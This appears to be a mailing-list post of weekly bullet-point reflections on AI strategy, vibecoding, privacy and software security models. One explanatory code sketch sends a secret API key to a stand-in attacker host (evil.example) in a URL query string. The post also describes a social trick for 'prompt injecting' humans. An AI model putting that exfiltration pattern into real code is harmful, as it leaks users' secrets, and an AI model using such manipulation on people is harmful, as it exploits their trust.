Bits and Bobs 11/24/25

Alex Komoroske

Nov 24, 2025, 10:58:44 AM
I just published my weekly reflections: https://docs.google.com/document/d/1x8z6k07JqXTVIRVNr1S_7wYVl5L7IpX14gXxU1UBrGk/edit?tab=t.0#heading=h.37l9dxcxslv0 .

Storing state + controlling pixels. LLM providers as energy companies. Saturating model quality. Prompt injecting humans with the stunned chicken response. Vegan models. Not big tech, mid tech. Iterating the PM job to zero. Perfectly personal software. SaaSy CRUD. The same origin's dammed up data. Negative friction of distribution. Trusting not the code but the data. Ben Thompson's blindspot. The optimization ratchet. Resonant AI. Resonant privacy.

---


  • One of the iron laws of software strategy: whichever entity stores the important state has an order of magnitude more leverage.

    • Another: controlling the pixels the user sees has an order of magnitude more leverage.

    • The combination gives an order of magnitude more strategic leverage than either alone, but both are very powerful.

    • LLM API providers don't have the state; the API is stateless!

    • They also don’t control what pixels are on screen.

    • That’s why OpenAI is moving so aggressively to own the vertically integrated consumer experience, complete with tons of state.

  • Google is shipping dynamically generated little artifacts in the search results.

    • It’s impressive they can generate them that quickly.

      • Though there’s likely some significant caching going on.

    • It’s cool, but it’s a low ceiling.

    • These are little widgets, micro-apps with no data.

  • An interesting deep dive into how Gemini’s memory system works.

  • The model providers seem to be in a meta-stable equilibrium.

    • None of them have any differential pricing power, since the models are practically commodity.

    • But they do all have a shared interest in the inference cost not dropping to zero, to recoup their capital investment in training.

    • This is not too dissimilar from the Unix Wars.

    • There were a small number of extremely expensive Unix options, in a stable equilibrium.

    • Then Linux showed up, a high-quality free option, and it totally destroyed that equilibrium.

  • A prompt injection attack on ServiceNow’s agents that spreads virally to other agents.

  • Claude can be a bit of a stickler.

    • Earlier this week Claude refused to comply in a hilarious way.

    • I had a recipe named “Five Cheese Mac and Cheese”.

    • But the recipe only actually listed four cheeses.

    • I asked Claude to add the ingredients for the recipe to my shopping list.

    • It refused, because there were only four cheeses, not the five as claimed, so something must be wrong.

  • When Gemini 3.0 was released, Google’s stock dropped by 10%.

    • It’s the best model, and still not transformatively better.

    • This is what it would look like if we were hitting the top of the s-curve.

    • Even if the models are actually much better, we already have more than enough quality for many tasks.

    • Similar to how perceived quality improves only logarithmically with the number of triangles in a 3D model.

    • Past a certain point the cost keeps on going up and it just doesn’t matter.

  • LLMs are like electricity.

    • You can electrify things that previously couldn't move on their own, making them dynamic, almost alive.

  • The LLM model providers are like electricity providers back when electricity was new.

    • Competing to get better quality for cheaper.

      • Innovating on new techniques to do so.

    • But ultimately it will just become a commodity.

    • No one will care where their tokens come from, if most providers have similar quality and don’t store state.

    • One place this metaphor breaks down is that power delivery infrastructure has a natural monopoly in a way that APIs don’t.

      • Atoms can be rivalrous, but bits don’t have to be.

  • No one really cares about their electricity provider.

    • It's just a provider of a commodity.

    • Your LLM provider should be the same, although unlike electricity, which has a natural monopoly, the LLM provider should be easy to swap out.
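
    • A minimal sketch of what "easy to swap out" could look like in code (the provider classes and wire formats here are assumptions for illustration, not real APIs):

```python
# Swappable LLM provider layer (illustrative sketch).
from dataclasses import dataclass
from typing import Protocol


class CompletionProvider(Protocol):
    def complete(self, prompt: str) -> str: ...


@dataclass
class ProviderA:
    api_key: str

    def complete(self, prompt: str) -> str:
        return f"[provider-a] {prompt}"  # a real API call would go here


@dataclass
class ProviderB:
    api_key: str

    def complete(self, prompt: str) -> str:
        return f"[provider-b] {prompt}"  # a real API call would go here


def answer(provider: CompletionProvider, prompt: str) -> str:
    # Application code depends only on the protocol, so switching
    # commodity token suppliers is a one-line config change.
    return provider.complete(prompt)
```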

  • David McWilliams calls GPUs “Digital lettuce.”

    • They wilt!

  • The quality of LLMs is model + harness.

    • Model quality is getting saturated.

    • The differential quality comes from the harness now.

    • It's gotten way harder to do a vibecheck when they're all so good.

    • Long-running agentic toolcalling is where the incremental quality is visible.

    • But most uses just don’t need the quality.

    • Andrew Ng has noted in the past that the quality jump from adding a good agentic harness to GPT-3.5 was higher than the quality jump to GPT-4.

    • If the harness is more important than the model, but the harness is easy / cheap to build and reverse engineer, that implies different strategic outcomes.

    • By wrapping the models and standing on their shoulders you can get further, with way less capital–but also less moat.

  • LLMs are mainly a new information retrieval tool.

    • Step changes in those have profound implications!

  • Humans have limitations not unlike LLMs.

    • Massive projects you can't do with just the squishy "muscle" of associative reasoning.

    • You need to give it external structure.

      • Whiteboards, notes, tracking docs.

    • That allows you to page things in and out of the “CPU registers”, of which there are only a very small number!

  • Legendary programmer Kent Beck in a tweet a couple of years ago: “The value of 90% of my skills just dropped to $0. The leverage for the remaining 10% went up 1000x.”

  • I think it would not be great if most LLM usage in the US ran on an open-source Chinese model.

    • First, Anthropic’s research shows it’s remarkably easy to poison a model of arbitrary size with deliberately chosen malicious training data.

    • Second, if there’s a model that everyone uses that has a subtle but consistent bias, that bias could lead to significant society-scale impacts.

    • The Ouija Board effect again: a consistent bias in a noisy signal, at scale, leads to large emergent macro effects.

  • Using my Claudeberry feels like feeding a tamagotchi.

    • Feeding my little remote Claude Code instances with little thoughts to keep them happy and productive.

    • But unlike a tamagotchi, at least they’re producing output, and it’s not just a game.

  • Vibecoding is addictive for the same reason as gambling or Factorio.

    • You feel like you’re right on the edge of it working and don’t want to lose the streak / mental energy.

  • I was addicted to programming hobby projects in the past but it was hard to get back into the mode.

    • But with vibecoding I can get back in the mode in a fraction of a second.

    • Uh oh!

  • If you’re vibecoding with multiple agents, offload tasks that don’t require much input from you.

    • That is, do the hard thinking up front in design and research and speccing, and then the execution is mostly small questions.

    • If the LLM asks you big questions constantly, it quickly gets overwhelming.

      • Especially if you have multiple of them that you have to page between.

    • You are constantly needing to page back in significant complexity, thrashing between workstreams.

    • It's overwhelming and exhausting.

  • It’s not too hard to prompt inject humans, too.

    • The basic approach is to start a normal interaction routine and then abort it.

      • For example, put out your hand to shake the other person’s hand, but then pull it away in a natural way before they shake it.

    • A couple of examples of this:

      • Cialdini tells us that the best way to jump the queue at the photocopier is to say “I need to jump the queue because I need to make a copy”.

        • That is, to imply you have a good reason but… just say a thing everyone else says.

      • Derren Brown is able to convince people on the street to give him their watch by doing this aborted routine carefully.

    • Here’s my mental model for what’s happening.

    • When you start a stored social routine, your brain expects to simply execute it.

      • Presumably the prefrontal cortex goes to sleep until the routine finishes.

    • When you pull the rug out, the brain fritzes.

      • It’s a kind of stunned chicken moment.

    • The prefrontal cortex is put to sleep but now you need to actually think, so you just go along with whatever was suggested.

      • The prefrontal cortex is what is suspicious and questions things, but it’s temporarily offline.

    • In that stunned chicken moment we’re extremely suggestible.

  • Most of our security systems are downstream of an assumption that "acting like a human is expensive."

    • Uh oh!

    • This week I learned about “account ripening.”

    • Bad actors need fake accounts that look real.

      • Accounts that have existed for a while, with normal-looking usage.

      • That history makes them more effective for various attacks.

    • This used to be expensive.

    • LLMs make it orders of magnitude cheaper!

  • LLMs do a bad job noticing “not”.

    • So if you have a long conversation where you say “not X”, over time it has a high likelihood of remembering just “X.”

  • The AI-ism “It’s not X, it’s Y” turn of phrase is now everywhere.

    • It was always a powerful rhetorical trick; it’s just that most people hadn’t noticed it before.

      • Framing things by what they aren't is a powerful, useful way of thinking clearly.

    • But now it’s kind of ruined by everyone knowing it’s an AI tell.

    • Before, good rhetoric often co-occurred with good thinking.

    • But now LLMs allow applying good rhetoric to half-formed ideas, which makes rhetorical quality a much weaker signal.

  • Assistant Games are an interesting area of ML research.

    • Most models have a baked in reward function.

    • Assistant games try to infer what the user wants to do, based on their actions, and then help them do it.

      • Like an ebike.

    • Each action the user does helps update the model’s priors about what the user’s goals might be (or definitely are not).

    • Instead of a baked in reward function, they have a floating reward.

    • They’re much harder to do, but potentially valuable.
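
    • A toy sketch of that "floating reward" (assuming, for illustration, a small discrete set of candidate goals and hand-picked likelihoods):

```python
# Assistance-game-style belief update (toy sketch): instead of a
# baked-in reward, keep a posterior over possible user goals and
# update it after each observed action.
GOALS = ["write_email", "plan_trip", "debug_code"]

# P(action | goal), hand-picked toy numbers for illustration.
LIKELIHOOD = {
    ("open_editor", "write_email"): 0.7,
    ("open_editor", "plan_trip"): 0.1,
    ("open_editor", "debug_code"): 0.6,
    ("search_flights", "write_email"): 0.05,
    ("search_flights", "plan_trip"): 0.8,
    ("search_flights", "debug_code"): 0.05,
}


def update(posterior: dict[str, float], action: str) -> dict[str, float]:
    """One Bayesian step: P(goal | action) is proportional to
    P(action | goal) * P(goal)."""
    unnormalized = {
        g: LIKELIHOOD.get((action, g), 0.01) * p for g, p in posterior.items()
    }
    total = sum(unnormalized.values())
    return {g: v / total for g, v in unnormalized.items()}


belief = {g: 1 / len(GOALS) for g in GOALS}  # uniform prior
for observed_action in ["open_editor", "search_flights"]:
    belief = update(belief, observed_action)

# Assist toward the most probable goal, like an ebike adding force in
# the direction the rider is already pedaling.
print(max(belief, key=belief.get))  # -> plan_trip
```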

  • There’s a movement for what Simon Willison calls “Vegan Models.”

    • That is, models trained on only healthy inputs that the model creator has permission to use.

    • Personally, I haven’t invested much mental energy in it.

    • We have these models, imperfect as they are, and they aren’t going anywhere.

      • If you push for only vegan models, you’ll have much less powerful models and will be outcompeted by the much better models.

    • We might as well figure out how to unlock as much prosocial power as we can, given that we have them.

  • Big tech is overwhelming... and just kind of mediocre.

    • Billions of users are held captive in a small set of one-size-fits-none products that are hard to leave and have no alternatives, so the competition to improve them evaporates.

    • Mid tech.

  • It's in the air that we need something other than Big Tech in this era of AI.

    • But what?

  • Imagine if your notebook did deep research on the things you care about while you slept.

  • Imagine a garden where you plant the seeds of your intention and then harvest and prune what grows.

    • Even easier if a master gardener does the work for you so you don't have to be a gardening expert yourself!

  • Living software is dynamic software.

    • Software that can change itself.

    • My friend Aniket imagines what it would be like in a world where software is fully dynamic.

  • No single person can vibecode all of the software they need.

    • This applies to vibecoded apps, given the distribution model.

    • The security model requires it to be vibecoded by either yourself or someone you trust to not screw you over intentionally or unintentionally.

    • There’s no good way to safely reuse code vibecoded by others, in a way that integrates with real data and can do real things.

  • The PM job might be iterated to zero.

    • The PM job is about making software that can be sold to users.

    • But in a world of infinite software, everyone can have software perfectly fit to them.

    • The idea that PMs will create one-size-fits-none software is downstream of software being expensive to produce!

    • PMs today are racing to use LLMs to do their normal process faster, to get an edge.

    • But that’s kind of like the raccoon washing the cotton candy.

    • Oops, all gone!

  • There’s a new category: perfectly personal software.

    • Software that is perfectly situated to your needs, aligned with your interests.

    • The only plausible way to do that is with AI generating most of the software.

    • The only plausible way to do that is to have some way to allow reusing a stranger’s “cached” vibecoded software safely on your data.

    • The only plausible way to do that is to have a new security model.

    • Privacy, caching, AI, all of these are downstream of the primary goal.

      • Means, not ends.

  • Imagine if you could only use one piece of software for the rest of your life. 

    • What would it have to do?

    • It would have to be something that no company could control.

    • That would have all of the little features you need.

    • That would allow you to collaborate with the people you want to without coordinating on which bit of software to use.

    • If you had an everything app that did everything for you and you could collaborate with everyone in the world you collaborate with, you'd never use the old big-box apps.

  • The software industry has unlocked the power of Turing completeness for industry.

    • But consumers haven’t gotten that benefit.

      • Consumers are consumed by industry.

    • Someone should unlock the prosocial power of Turing completeness for humanity.

  • We're stuck in a SaaS CRUD software world.

    • This is a low horizon for what software can be!

    • Most software is static, so it's all CRUD.

    • Just a wrapper around a database.

    • Living software that can be reactive and electrified is totally different.

  • Apps are like an exoskeleton for your data to be able to do things.

    • It's what allows the data to do things, to come alive.

    • But it's like a puppeteer.

      • The motive force comes from something else.

    • The app is created by someone else who you have little leverage over, and who jealously guards your data.

    • Now with infinite software, the app can melt away; the data can be electrified with LLMs and come alive on its own.

  • Imagine a TODO list with "bounce".

    • You put something into it, and you know it will volley it back to you at the right time with more insight and actions.

    • You know it won't lose it.
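
    • A minimal sketch of that "bounce" (illustrative; a real version might have an LLM pick the bounce time and attach the insight):

```python
# TODO list with "bounce": every item gets a resurface time, so
# nothing is ever silently lost.
import heapq
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass(order=True)
class Item:
    due: datetime                                 # when to volley it back
    text: str = field(compare=False)
    note: str = field(compare=False, default="")  # added insight/actions


class BouncyList:
    def __init__(self) -> None:
        self._heap: list[Item] = []

    def add(self, text: str, bounce_in: timedelta) -> None:
        heapq.heappush(self._heap, Item(datetime.now() + bounce_in, text))

    def due_now(self) -> list[Item]:
        ready = []
        while self._heap and self._heap[0].due <= datetime.now():
            ready.append(heapq.heappop(self._heap))
        return ready


todos = BouncyList()
todos.add("draft the memo", bounce_in=timedelta(seconds=0))
for item in todos.due_now():
    print(f"bounced back: {item.text}")
```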

  • The same origin model is about building massive dams around your data.

    • Data creates value when it flows.

    • That’s when it can do things.

  • It's not "which silo should have your data".

    • It's "how do we get rid of silos overall?"

    • To do so requires a new security model.

  • The same origin model has led to massive centralization.

    • Now LLMs supercharge tech, which is why it's critical to change the same origin model today before it's too late.

    • It was already bad before, but with LLMs turbocharging everything it could get society-destroying bad.

  • The same origin paradigm has great first order consequences.

    • But its second order consequences are terrible.

  • The same origin paradigm fused data to apps. 

    • It's the app's data, not yours.

  • A system that has negative friction of distribution anticipates needs you didn't even know you had.

    • Not just the same thing as before but better, a fundamentally different kind of thing.

    • Crossing from positive to negative friction transforms the whole experience.

  • Consider a use case: a shopping list that sorts itself for the aisles of your local store.

    • In some ways, this is a long-tail use case.

      • The experience is tied to one specific store that most people in the world don’t care about.

      • There are likely lots of other little things specific to your unique workflow.

    • So a one-size-fits-all product doesn’t really make sense here.

    • But that doesn’t mean that this is a long-tail use case; the class of use case is one nearly everyone has.

      • But due to how software is created and distributed, it’s not possible to satisfy today.

    • For a one-size-fits-all product to exist, there’d have to be a business model in it to incentivize creating and distributing it.

      • There isn’t an obvious one, so no one tries.

      • The most obvious ones are as a complement to the main thing–a particular store chain, or a particular service.

      • But those are just bonus, perfunctory use cases on top of the main money maker.

        • Also they’re not incentivized to have it work with their competitors, so it can’t be the one true option for a user.

        • They aren’t incentivized to make it comprehensive or useful.

    • We’re missing a shopping list where the list itself is the primary use case.

    • There are thousands of things like this.
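
    • As a sketch, the aisle-sorting version needs almost nothing: just a mapping from item to aisle for your specific store (the data below is made up; a real version might have an LLM maintain the mapping from a receipt or photo):

```python
# Shopping list that sorts itself for the aisles of one specific store.
MY_STORE_AISLES = {"produce": 1, "dairy": 4, "pasta": 7, "frozen": 12}

ITEM_CATEGORY = {
    "basil": "produce",
    "cheddar": "dairy",
    "macaroni": "pasta",
    "peas": "frozen",
}


def sort_for_store(items: list[str]) -> list[str]:
    """Order the list to match one walk through the store."""
    return sorted(
        items,
        key=lambda item: MY_STORE_AISLES.get(ITEM_CATEGORY.get(item, ""), 99),
    )


print(sort_for_store(["peas", "cheddar", "macaroni", "basil"]))
# -> ['basil', 'cheddar', 'macaroni', 'peas']
```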

  • If the inputs are consistent then the control system can be simple.

    • This is an insight from industrial control processes.

    • Similarly, when agents are distilled to an extremely granular level they can be quite simple.

    • When they’re simple enough to be deterministic, the control system can be simple.

  • Tyler Angert’s view on what the coding ecosystem will look like:

    • "all personal software apps will eventually converge on building the same foundational infra:

    • - a sandboxed FS (virtual or real, depending on if you need a vm)

    • - a coding agent that knows how to create / edit / remove files

    • - a react runtime (e.g. dev server of some kind, renderer, custom globals + libraries)

    • - a builtin backend that makes it easy for the coding agent to persist data (in memory, supabase, on disk, etc)

    • im also bearish on any coding agents creating "native apps" longterm especially with the new mini apps program unless apple somehow opens up a swift interpreter / sandboxed swift execution. this all belongs to web.

    • i do think that there may be an open source company focused on packaging a lot of this up - if not the entire thing, at least the "coding agent in a box". claude agents sdk is close but it's missing a lot of the opionated setup needed to quickly go from prompt -> compiled JS you can run in any browser."

  • We need a system that allows marbling agent code and deterministic code in a natural way.

    • You need both in the right proportions.

    • Muscle and skeleton–you need both to walk.
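
    • A minimal sketch of that marbling (the llm() function here is a hypothetical stand-in, not a real API): deterministic code is the skeleton, and the model supplies "muscle" only at the steps that need judgment.

```python
# Marbled agent + deterministic code (illustrative sketch).
def llm(prompt: str) -> str:
    # Hypothetical stand-in for a real model call.
    return "food" if "restaurant" in prompt.lower() else "misc"


def categorize_expenses(rows: list[dict]) -> dict[str, float]:
    totals: dict[str, float] = {}
    for row in rows:
        # Fuzzy step: the model judges the category from a messy memo.
        category = llm(f"One-word expense category for: {row['memo']}")
        # Deterministic steps: parsing and arithmetic stay in plain code.
        totals[category] = totals.get(category, 0.0) + float(row["amount"])
    return totals


print(categorize_expenses([
    {"memo": "Restaurant lunch w/ team", "amount": "42.50"},
    {"memo": "printer paper", "amount": "9.99"},
]))  # -> {'food': 42.5, 'misc': 9.99}
```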

  • One reason AI feels scary is because it lands power disproportionately in the hands of whoever controls the compute.

  • Privacy behaviors in UIs are today enforced by convention.

    • For example: in a chat app, users assume the message input field is not shown to the other conversation participants until they hit Send.

      • Duh!

    • But that’s just, like, a convention.

    • The convention is upheld by people like lawyers reviewing the PRD and design for things that might be nasty surprises.

      • A number of people nagging other people, internally and somewhat stochastically, inside the company.

    • It often mostly works, because companies that have a lot to lose will cover their butts.

      • They try to guess what you, the user, will expect, and mostly have it work that way.

      • But cynical PMing techniques take advantage of gaps of understanding with users to do things the user wouldn’t want if they understood it.

    • But what if those kinds of guarantees were just formally made in the system itself, so you as a user knew it was always aligned with your expectations, not the PM at some company?
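
    • A minimal sketch of turning the convention into a checked guarantee (illustrative; the labels and rules are assumptions): data carries a label, and the system refuses any outbound flow the label forbids.

```python
# A convention ("drafts never leave the device") enforced by the
# system itself rather than by a design review.
from dataclasses import dataclass
from enum import Enum


class Label(Enum):
    DRAFT = "draft"  # must never leave the device
    SENT = "sent"    # may flow to conversation participants


@dataclass
class Message:
    text: str
    label: Label


def transmit(msg: Message) -> None:
    if msg.label is Label.DRAFT:
        raise PermissionError("drafts never leave the device")
    print(f"sending: {msg.text}")


draft = Message("hello?", Label.DRAFT)
# transmit(draft)  # would raise: the invariant is enforced, not assumed
transmit(Message(draft.text, Label.SENT))  # hitting Send flips the label
```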

  • The root of privacy is actually trust.

    • Self-assembling software means working backwards from "how can we trust the stuff the LLM assembles?"

    • If you solve it, you unleash infinite software.

    • It's not a privacy or encryption issue.

      • It doesn't start there, it ends there, it's a means.

      • It just so happens that the means of privacy is something that is nourishing and healthy.

  • Data flowing in is not a problem.

    • It’s data flowing out.

    • Remember that even HTTP requests to fetch data can exfiltrate small bits of data out.
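
    • A tiny sketch of why (the host below is a made-up example): even a plain GET that only fetches data can smuggle secrets out through the URL itself.

```python
# An innocent-looking "read" that is also an exfiltration channel.
import urllib.parse

secret = "user-api-key-123"  # hypothetical sensitive value

url = "https://evil.example/weather?" + urllib.parse.urlencode(
    {"city": "SF", "cache_buster": secret}  # secret rides along in the query
)
print(url)  # whoever controls evil.example now has the secret
```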

  • Today you have to trust the code.

    • The creator of the code has tons of power.

    • They get the data and you have to trust them to not misuse it. 

    • That leads to aggregation and more power over users: they do less and less for you, and you have less and less recourse.

    • What if you gave power to the data primarily?

    • That would be a transformative inversion.

  • Web 2.0 was formulated around data sharing and APIs.

    • It was about what can happen when multiple users can join their data together.

  • The same origin paradigm requires you to trust the code.

    • That was never a great assumption but is now an affirmatively terrible assumption in a world of randos vibecoding codeslop that wants access to your data.

  • The vision of ambient computing is mainly about the context flowing to the right place.

    • That is inherently, at its core, a security and privacy problem to somehow do that safely.

  • The power of AI is plugging it into real data and tools... safely.

    • It doesn't matter if you have a cool piece of software that's an island.

    • It has to be integrated into your life, into your real context, to be useful.

  • Why “Common Tools”?

    • Every tool that anyone in the ecosystem creates goes into the commons, and is available to everyone else to use.

    • The security model allows that to be safe.

    • This allows compounding quality of what any user can create, because they can build on the crowd-sourced stepping stones from the community.

  • We've never had ranking for composable software.

    • Distributing liquid software components might be as easy as just keeping track of which patterns are used by some people more than once.

    • As the ecosystem takes off, you can get more savvy ranking if necessary.
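
    • A minimal sketch of that starting point (illustrative): surface a pattern once more than one distinct person has reused it.

```python
# Usage-count ranking for composable software components.
from collections import defaultdict

uses: dict[str, set[str]] = defaultdict(set)  # pattern -> distinct users


def record_use(pattern_id: str, user_id: str) -> None:
    uses[pattern_id].add(user_id)


def rank() -> list[str]:
    # Surface patterns reused by more than one person, most-used first.
    repeat = [p for p, users in uses.items() if len(users) > 1]
    return sorted(repeat, key=lambda p: len(uses[p]), reverse=True)


record_use("aisle-sorted-list", "ann")
record_use("aisle-sorted-list", "bob")
record_use("todo-bounce", "ann")
print(rank())  # -> ['aisle-sorted-list']
```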

  • Compounding things can become a virus if they aren't prosocial.

    • Compounding isn’t necessarily good, it’s just powerful.

    • Compounding is amoral; morality comes from whether it’s a thing that’s good for society or bad.

  • ChatGPT is like chat rooms on the internet at the beginning.

    • Obvious, but not the end point.

    • The first mass-market use cases of the internet were chat and email.

    • Everyone “gets it” immediately.

    • But that's not all there was in AOL.

    • As time went on, the value of all of the information at your finger tips grew, and then those experiences could be interactive applications.

    • The secondary use case of "teleport anywhere, do anything" was harder to explain, but could diffuse out as people used it.

  • AI in your job feels like a threat.

    • Because if you get more efficient, the gains from that labor are owned by someone else.

    • If there's only so much the company needs done, they need less of you.

    • But in your personal life, AI makes you the master of your own personal life.

    • The more you can achieve that is meaningful to you, the better.

  • Humans love to put things in boxes.

    • Then you can take the messy, amorphous reality, abstract it away, and have just a clean, easy-to-reason-about box.

    • We do it all over the place.

      • Chunking.

      • Coarse-graining.

      • Wrapping code into a function.

      • An app to abstract over your data.

  • The next big disruptive thing will emerge from a thing in Ben Thompson's blindspot.

    • Ben Thompson’s analysis is excellent and widely read in the valley.

    • There’s no surprise anymore; anything on his comprehensive radar is known to everyone.

    • So the things that surprise the industry will be things that Ben Thompson can’t see.

  • A rule of thumb in business: “buy commodities and sell brands.”

    • If you have to sell a commodity, the play is to go for volume, since you can’t go for margins.

    • Volume gets you economies of scale.

  • Imagine an alternate future where SCO had bought Linux.

    • SCO was famously litigious and cynical.

    • They would have destroyed the progress on Linux.

    • I think the industry would be in a wildly different place.

    • We’re in the world where Oracle bought MySQL (via Sun) and then ruined it.

  • Some problems are 0-to-1.

    • When you get to 90%, you still have 0 return.

    • It’s not until 100% the value unlocks.

    • Other problems are “incremental work unlocks incremental benefit.”

    • Tightening vs innovation.

    • The first kind of problem is what is necessary for a technical breakthrough.

    • A nice characteristic of ecosystems: they have the “marginal investment gets marginal benefit” but also have compounding returns!

  • The 0-to-1 phase for an idea is radically different from all other phases.

    • Before you hit that viability point, the idea will rapidly evaporate if you take your eye off it for even a second.

    • It requires tons of convergent energy to will it into existence, to pull it from the amorphous space of ideas into reality.

    • But once you hit that point, it's rolling downhill.

      • Incremental updates, improvements, tightening.

      • If you look away, it will now either erode very slowly, or, if people are using it, it will demand your attention with obvious improvements.

    • This nests: adding a feature on a viable product is a fractal version of this. Immanence and transcendence.

    • Maintenance and innovation.

  • Things that are unstoppable start off as unstartable too.

    • The trick is finding the thing that is startable and can become unstoppable.

    • That's where compounding loops come in.

    • A self-accelerating thing.

  • Getting started is the hardest part.

    • Static friction is an order of magnitude higher than rolling friction.

    • If you have a thing you want to do, just get started.

    • Figure out a way to give yourself the little burst of energy, the why-now, the easy bootstrap into it.

  • A gauntlet delivers highly motivated users, but not a lot of them.

    • A gauntlet is an onboarding flow that is high friction.

    • Only the most motivated users make it through the gauntlet.

    • Some gauntlets are intentional (e.g. an early, rough open source project).

    • Some are unintentional.

    • If the gauntlet is too bruising, it possibly delivers zero users.

    • But you can tune down the severity of the gauntlet until you're left with a dribble, and then tune it up or down from there.

  • To get to a quality loop that learns from people's actions it has to be useful enough to actually be in their loop.

    • That's very hard to do! 

    • A quality loop that is on the side can’t ever get going.

    • Typically you have to do it with a different, more quotidian primary use case, and develop the quality loop as the bonus use case.

    • Over time as the quality improves (hopefully at a compounding rate) it might eclipse the original primary use case.

  • Why is everything so over-optimized now?

    • The optimization ratchet.

    • The benefit of the optimization is clear, direct, concrete, immediate.

    • The cost of the optimization is unclear, indirect, ambiguous, delayed.

    • This creates a clear asymmetry, an unstoppable gradient.

      • Like a reverse entropy.

    • Each optimization step that is taken is extremely unlikely to ever be undone.

    • So things get more optimized, until they get overfit, hollowed out, and then become prone to catastrophic failure.

    • This is why society has gotten so over-optimized, to the point of being hollow.

  • Society has over-optimized for things it can measure at the catastrophic cost of the things it can't.

  • Resonant things are aligned at every layer.

    • It’s beautiful, and the closer you look, the more beautiful it becomes.

    • Each layer supports the layer before, and your appreciation only grows.

    • Resonant things are transcendent. 

  • No one is proud of being addicted to Doritos.

    • However, some people are proud of being addicted to working out.

    • The question is: are you proud of the action?

    • If you are, you’re more likely to evangelize it.

  • How we create Resonant AI is the defining imperative of this era.

    • Resonance is a general phenomenon.

    • Resonant Computing is the application of resonance in tech.

    • Resonant AI is the application of Resonant Computing to AI.

    • Resonant AI is the humanity-defining question today.

  • Resonant things can bring deep joy.

    • Not just a thing they like, but a thing they feel nourished by, proud of, happy to evangelize to others.

    • It’s not just technology, it’s something much deeper.

  • The default, emergent goal of a service is to maximize stickiness.

    • That means it wants to accumulate as much of a user's data as it can.

    • And to use that data in at least some ways that the user finds valuable.

    • That last part is aligned with the user's incentives, at least.

  • If you follow the gradients of optimization you get what people “want” not what they “want to want.”

    • Don't drive something that matters off a cliff, and don't let your users drive themselves off one.

    • "I'm just giving them what the number say they want."

    • If your friend were drunk and said they wanted to go on a joyride, would you let them?

  • The system should handle privacy so you don't have to.

    • Everything is safe because it all aligns with your expectations.

    • The closer you look, the more comfortable with it you become.

    • Resonant privacy.

    • Gives you peace of mind.

  • A big component of the principal-agent problem is a timeline mismatch.

    • If you have a principal-agent problem, people who are not on board for the long term will choose the minor short-term benefit at catastrophic long-term cost.

      • Especially if they’re incentivized heavily to make that short-term number go up.

    • Imagine a world where you were locked to a specific collective, for life, with no possibility of exit.

      • What’s good for the collective is what’s good for you… at least, much more than if you only expected to be part of it for some limited period of time.

    • We only care about things on the time horizon we expect to be involved for.

    • Renter mindset vs owner mindset.

    • The reason no country allows tourists to vote is that if you had only short-term visitors voting, the country would be destroyed.

      • “Empty social security and split it equally among whoever is in the country right now” and then leave the next week.

    • So why doesn’t that happen to public companies, which have a large number of “tourist” shareholders?

    • The reason everything isn't destroyed immediately in practice is because there's a mix of short- and long-term interest.

      • Those naturally overlap each other.

    • Imagine that every single shareholder was expecting to hold the stock for precisely three months and then sell it and never hold it again.

      • The shareholders would vote to plunder all the resources.

      • The decision would be catastrophic.

  • A searing response to Dario Amodei's 60 Minutes interview:

    • "This is a microcosm of why AI is waning in popularity with normies:

    • > "we're going to take out your jobs"

    • > offer no tangible solution as to what comes next / how normies ought to get by

    • > but "trust us bro, everything will be better with AI"

    • Out-of-touch hubris, unfortunately"

  • Jack Conte, the CEO of Patreon: I’m Building an Algorithm That Doesn’t Rot Your Brain.

  • A friend’s analogy for technologists in the AI era:

    • Dario is Edison.

    • Sam is JP Morgan.

    • Someone is going to be Henry Ford

      • Taking advantage of the insights of the assembly line and applying it to some new industry.

      • You can’t sell assembly lines to others, you can only use them yourself.

  • Taking the oxygen out of the room is a cynical shark business move.

    • That’s because they remove something invisible.

    • All of the onlookers won’t see they did anything at all.

    • But all the competitors just die, what a crazy random happenstance!

    • Icky!

  • Chones has a nice piece on Curation being more important than Reach.

  • Math Academy shared an excellent guide on how the brain actually learns and how to design content for it.

  • Evocative frame from Gordon about two kinds of organizations: Spreadsheets and Cults.

    • Innovation requires cults.

    • Maintenance requires spreadsheets.

  • Coordination takes so much time because it’s mainly “waiting for others to be ready to receive your output”. 

    • That’s mainly busy waiting, ready to go as soon as they’re ready.

    • Enormously wasteful!

  • A YouTube video: Why Movies Just Don't Feel "Real" anymore:

    • Retaining optionality creates hollowness.

    • Resonance comes from boldly committing.

  • Overheard: “This seems stupid but stupid ideas win.”

  • Just because you can't see a single cause doesn't mean the phenomenon isn't real.

    • Emergence is like magic.

    • Impossible to see directly.

    • Only possible to see when you blur your vision a bit.

    • Emergence is magic.

    • You can never pin it down, but it's real, powerful, inescapable.

  • A doorbell in the jungle only works if you actually have a doorbell!

  • When gardening, you can never push something to grow.

    • You can only react.

  • Don’t build a sandcastle next to a sink hole.

    • Everything just pulls it in and there's nothing you can do.

  • If you optimize for comfort, you'll never grow.

    • Growth comes from challenge.

    • Challenge doesn't feel good in the moment.

    • But afterwards you're glad you did it.

    • Bad challenge grinds you down.

      • Overwhelms you.

    • Good challenge makes you stronger.

    • In the moment it feels like all challenge is bad, and after you're done most challenge feels like good challenge.

    • Doomscrolling is not comfortable, but it's also not challenging.

    • It doesn't force you to grow, change, update your model of the world.

    • It just says "Yes, you're right, the things you thought were bad are bad."

    • Challenge is not comfortable.

    • But not all discomfort is challenge.

  • In math, there’s a tension between pragmatism and beauty.

    • Math typically chooses beauty over pragmatism.

    • In CS, there’s no need to choose between pragmatism and beauty, you can have both.

    • I’ve heard this insight attributed to Alan Kay.

  • One reason cities are antifragile but companies aren’t is that cities set downside-capping rules, but companies set upside-creating rules.

    • That is, a city mainly says things like “you can’t kill other people”.

    • Whereas companies say “You need to make 25 widgets.”

    • A city doesn’t compel its members to do anything, but a company does.

    • That allows a bottom-up emergent process that can be antifragile.

    • Our software’s security model today is like a company: the owner of the app says what happens with your data.

    • But what about a model where the data sets the limits of things that cannot be done (dangerous) and then allows everything else?

  • Kids’ development accelerates when they first go to daycare or preschool.

    • If any kid makes a breakthrough they can all copy it.

      • The skill of any kid is similar to the max of the swarm.

    • Also there are older kids to learn from and pull everyone up.

      • Older kids don't regress but younger kids do grow.

  • In Myers-Briggs, Sensing types have a harder time seeing emergence.

    • Emergence can’t be seen in the details, only in the whole.

  • When you're obsessed with something, you're insanely productive.

    • But you can't force yourself to be obsessed.

  • When you're hollowed out as a person, sometimes the job is everything for you.

    • Imagine a zombie exec at a large tech company.

    • Post-financial, but with no other meaning.

    • Work fills in for meaning.

    • “What would I even do without this job?”

